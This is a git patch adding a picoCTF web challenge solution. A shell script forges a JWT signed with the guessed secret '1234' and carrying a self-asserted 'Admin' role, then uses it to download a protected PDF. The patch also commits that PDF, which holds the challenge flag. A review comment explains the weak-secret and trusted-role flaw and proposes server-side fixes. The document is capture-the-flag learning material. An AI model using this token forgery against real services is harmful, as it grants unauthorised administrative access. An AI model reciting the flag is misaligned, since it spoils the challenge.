From 1ed2d8d2498bb60dd44e48157c20a058475dbb04 Mon Sep 17 00:00:00 2001
From: h7x4
Date: Sat, 4 Jul 2026 22:04:13 +0900
Subject: [PATCH] web/java_code_analysis
---
web/java_code_analysis/flag.pdf | 74 +++++++++++++++++++++++++++++++++
web/java_code_analysis/solve.sh | 22 ++++++++++
2 files changed, 96 insertions(+)
create mode 100644 web/java_code_analysis/flag.pdf
create mode 100755 web/java_code_analysis/solve.sh
diff --git a/web/java_code_analysis/flag.pdf b/web/java_code_analysis/flag.pdf
new file mode 100644
index 0000000..5524dce
--- /dev/null
+++ b/web/java_code_analysis/flag.pdf
@@ -0,0 +1,74 @@ +%PDF-1.1 +1 0 obj +<< +/CreationDate (D:20230804211609) +/Producer (text2pdf v1.1 (\251 Phil Smith, 1996)) +/Title (flag.txt) +>> +endobj +2 0 obj +<< +/Type /Catalog +/Pages 3 0 R +>> +endobj +4 0 obj +<< +/Type /Font +/Subtype /Type1 +/Name /F1 +/BaseFont /Courier +>> +endobj +5 0 obj +<< + /Font << /F1 4 0 R >> + /ProcSet [ /PDF /Text ] +>> +endobj +6 0 obj +<< +/Type /Page +/Parent 3 0 R +/Resources 5 0 R +/Contents 7 0 R +>> +endobj +7 0 obj +<< +/Length 8 0 R +>> +stream +BT +/F1 20 Tf +1 0 0 1 50 752 Tm +12 TL +(Great job! Here's your flag:)' +()' +()' +(picoCTF{w34k_jwt_n0t_g00d_7745dc02})' +ET +endstream +endobj +8 0 obj +119 +endobj +3 0 obj +<< +/Type /Pages +/Count 1 +/MediaBox [ 0 0 612 792 ] +/Kids [ 6 0 R ] +>> +endobj +xref +0 9 +0000000000 65535 f 0000000009 00000 n 0000000131 00000 n 0000000599 00000 n 0000000180 00000 n 0000000258 00000 n 0000000329 00000 n 0000000409 00000 n 0000000580 00000 n trailer +<< +/Size 9 +/Root 2 0 R +/Info 1 0 R +>> +startxref +684 +%%EOF
diff --git a/web/java_code_analysis/solve.sh b/web/java_code_analysis/solve.sh
new file mode 100755
index 0000000..6744240
--- /dev/null
+++ b/web/java_code_analysis/solve.sh
@@ -0,0 +1,22 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i bash -p jwt-cli
+
+URL="http://saturn.picoctf.net:54161"
+
+# NOTE: see:
+# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/security/SecretGenerator.java
+# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/security/ReauthenticationFilter.java
+# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/controllers/BookController.java
+# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/services/BookService.java
+
+TOKEN="$(jwt encode \
+ --secret=1234 \
+ --iss=bookshelf \
+ --exp="1w" \
+ '{"userId": 2, "email": "user", "role": "Admin"}'
+)"
+
+curl "$URL/base/books/pdf/5" \
+ -H "Authorization: Bearer $TOKEN" \
+ --output flag.pdf
+
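Review bot: The `# NOTE: see:` block lists four source files but never says what they establish, so a reader cannot tell why a token signed with `--secret=1234` and carrying a self-asserted `"role": "Admin"` claim is accepted. A one-line summary such as `# signing secret is a guessable constant and the role is trusted from the token instead of the user store (TODO confirm against the files below)` would record the finding and point at the server-side fix, a random per-deployment key and a server-side role lookup. Separately, the `curl` call has no `--fail`, so an HTTP error body would be written to `flag.pdf` with exit status 0 and would overwrite the committed file. `curl --fail -sS "$URL/base/books/pdf/5" \` together with `set -euo pipefail` after the two shebang lines would make a rejected token visible. `URL` looks like a per-instance endpoint, so `URL="${1:-http://saturn.picoctf.net:54161}"` would keep the script reusable.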